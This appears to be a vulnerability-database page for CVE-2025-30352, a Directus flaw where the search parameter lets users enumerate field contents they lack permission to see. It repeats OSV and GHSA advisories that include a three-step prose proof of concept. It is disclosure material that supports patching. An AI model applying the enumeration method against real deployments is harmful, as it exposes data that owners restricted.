CVE-2025-30352
published 2025-03-26CVE-2025-30352: Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search`…
PriorityP430medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EPSS
0.34%
26.3th percentile
Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents. The searchable columns (numbers & strings) are not checked against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields. Version 11.5.0 fixes the issue.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| directus | directus | — | — |
| directus | directus | >= 9.0.0-alpha.4 < 11.5.0 | 11.5.0 |
| monospace | directus | — | — |
| monospace | directus | >= 9.0.1 < 11.5.0 | 11.5.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Directus `search` query parameter allows enumeration of non permitted fields
osv·2025-03-26
CVE-2025-30352 [MEDIUM] Directus `search` query parameter allows enumeration of non permitted fields
Directus `search` query parameter allows enumeration of non permitted fields
### Summary
The `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents.
### Details
The searchable columns (numbers & strings) are not checked against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields.
### PoC
- Create a collection with a string / numeric field, configure the permissions for the public role to not include the field created
- Create items with identifiable content in the not permitted field
- Query the collection and include the field content in the `search` param
GHSA
Directus `search` query parameter allows enumeration of non permitted fields
ghsa·2025-03-26
CVE-2025-30352 [MEDIUM] CWE-200 Directus `search` query parameter allows enumeration of non permitted fields
Directus `search` query parameter allows enumeration of non permitted fields
### Summary
The `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents.
### Details
The searchable columns (numbers & strings) are not checked against permissions when injecting the `where` clauses for applying the search query. This leads to the possibility of enumerating those un-permitted fields.
### PoC
- Create a collection with a string / numeric field, configure the permissions for the public role to not include the field created
- Create items with identifiable content in the not permitted field
- Query the collection and include the field content in the `search` param
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-03-26
Published